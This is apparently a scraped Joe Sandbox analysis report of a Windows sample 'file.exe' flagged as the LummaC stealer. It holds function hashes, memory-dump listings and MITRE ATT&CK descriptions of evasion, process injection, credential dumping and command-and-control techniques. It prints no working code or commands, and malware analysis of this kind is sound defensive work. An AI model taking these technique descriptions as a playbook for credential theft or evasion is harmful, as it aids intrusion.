Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af21d1ec5c1574c076e97a868ac21a6d35a21bb9b6f0e17eb9841a5c61d2a80
Instruction ID: def7aafc25c953664f1fe642f0e096544f5d833e1799eb0d5d27143bcc82e910
Opcode Fuzzy Hash: 9af21d1ec5c1574c076e97a868ac21a6d35a21bb9b6f0e17eb9841a5c61d2a80
Instruction Fuzzy Hash: A52168B3E106348BF3504D28DC8936276929798320F2F42798F8C2B7C5D97E9E0692C8

Function 00E3059B Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6559ea471de02d084ac2827c1ca425ca87573b6994a4c3323de4ee7d47e0b0fa
Instruction ID: e979de43589ab2ef732e27ac99d72a28dd8bfa568681340e90794798a9512560
Opcode Fuzzy Hash: 6559ea471de02d084ac2827c1ca425ca87573b6994a4c3323de4ee7d47e0b0fa
Instruction Fuzzy Hash: CA2138B3F1052047F3588879CD993A6A583A7D4320F2FC2798E4DABBC5DDBE4C065280

Function 00E8656C Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a360ebff89e7574814730871e1832f9182aed04965bc4ceefa4d9d90d2d7ee52
Instruction ID: a3deae7e918ca544f9e4b90b50728476f56945ebd62fe01966275341bdf07146
Opcode Fuzzy Hash: a360ebff89e7574814730871e1832f9182aed04965bc4ceefa4d9d90d2d7ee52
Instruction Fuzzy Hash: 95215BB3F111210BF3484878C998362668397E5320F2F82798F1DA7BC9DCBE5D064384

Function 00EAB17A Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d642cd75b14918a8a969ce50c1661a36b33eea142f2ac1618298b59049058721
Instruction ID: 63b764808d7efc600bd4a17cd651a8b589625911419a86c9222d0f6ad2327d9b
Opcode Fuzzy Hash: d642cd75b14918a8a969ce50c1661a36b33eea142f2ac1618298b59049058721
Instruction Fuzzy Hash: 2A213DB3F0062647F3244C7DCD943626543DB95320F2F82399B69ABBC5D97D5C065280

Function 00E9E1D5 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2c47e6b9580b269d7f3c33e047aa2ed4b54283b83def954eb076c24a976da0
Instruction ID: 877f892bf82d509e561abe85acbc09601fe08d68fbf946be338f18b9ab37f82e
Opcode Fuzzy Hash: ab2c47e6b9580b269d7f3c33e047aa2ed4b54283b83def954eb076c24a976da0
Instruction Fuzzy Hash: 42214CB3F012264BF35049B9C998362B6539B95310F2F8235CE1C6BBC6E9BE5D0992C4

Function 00D945F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: c4c1e6f0a86890812954fab79d3873e639a827104f2780d99464a071e2a66990
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: F111A973A051E40ECB168D3C84109B5BFE30AA3639B5D8399F4F49B2D7D6228D8B8365

Function 00D8A060 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction ID: 12a81dbc514e4840f785ba110c7640f58ffa7e65512154be27fc62ee9939ef74
Opcode Fuzzy Hash: d6f3737fdae1c0a01f48b6376bcbd426907f24c0dc4d500755e45f99c257de23
Instruction Fuzzy Hash: 070171F570074157F720BE5894C1727B2A8AF80704F2D452DE90457246DB7AEC0997B2

Function 00D8B3DE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce00460021b59dfeac9578dc10906668e8dac6d712745d08f8b17a6c7a339bb
Instruction ID: 33eefd0b14987d08996297ee4cf4f5a2722b882728ef7969c38a2345f886ba01
Opcode Fuzzy Hash: 5ce00460021b59dfeac9578dc10906668e8dac6d712745d08f8b17a6c7a339bb
Instruction Fuzzy Hash: 55F0B425988BC346C3198B3E8070331EFE18F7B264F2C6569C4D257393D72688099724

Function 00D8B475 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162cd9efa36c3bab91213505dd43033bc86bebde8a65ba817897ebaeca8fc95e
Instruction ID: 86fb1770c2aecebed64f7c01652f69d8b2fc603b0007391424253d694e5755a8
Opcode Fuzzy Hash: 162cd9efa36c3bab91213505dd43033bc86bebde8a65ba817897ebaeca8fc95e
Instruction Fuzzy Hash: D0D022789086426BC308DF10FD12439B268CF4B296B002828E503EB303CE21E860853E

Function 00D6C274 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2236433040.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.2236416722.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236433040.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236480390.0000000000DB3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000DB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000000F43000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236497581.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236742591.0000000001060000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236953671.00000000011FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2236973078.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d35d2d79ed449effb04e5341b6aee89c7b443a4f41f3b05d65b7bca837a6a5
Instruction ID: 1f6da9f099f57107696b2cfc4a9cdb809dab5e0533f9984160946bb2305e0ac5
Opcode Fuzzy Hash: 10d35d2d79ed449effb04e5341b6aee89c7b443a4f41f3b05d65b7bca837a6a5
Instruction Fuzzy Hash: 73D0122094A3995AC3468F3C9CA1731B7B1EB03200F042548C142DB391C7D091168668

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 00D815F0 Relevance: 28.1, Strings: 22, Instructions: 608
COMMON

Function 00D96F90 Relevance: 25.1, APIs: 5, Strings: 9, Instructions: 579
memoryCOMMON

Function 00D6E2A9 Relevance: 12.5, APIs: 1, Strings: 7, Instructions: 531
COMMON

Function 00D6A960 Relevance: 9.2, Strings: 7, Instructions: 401
COMMON

Function 00D6CE55 Relevance: 9.0, Strings: 7, Instructions: 275
COMMON

Function 00D833A0 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Function 00D8BFDA Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 461
COMMON

Function 00D96C40 Relevance: 6.5, Strings: 5, Instructions: 265
COMMON

Function 00D6C36E Relevance: 6.5, Strings: 5, Instructions: 203
COMMON

Function 00D8C6D7 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 614
COMMON

Function 00D8BFD3 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 456
COMMON

Function 00D697B0 Relevance: 5.4, Strings: 4, Instructions: 396
COMMON

Function 00D86170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

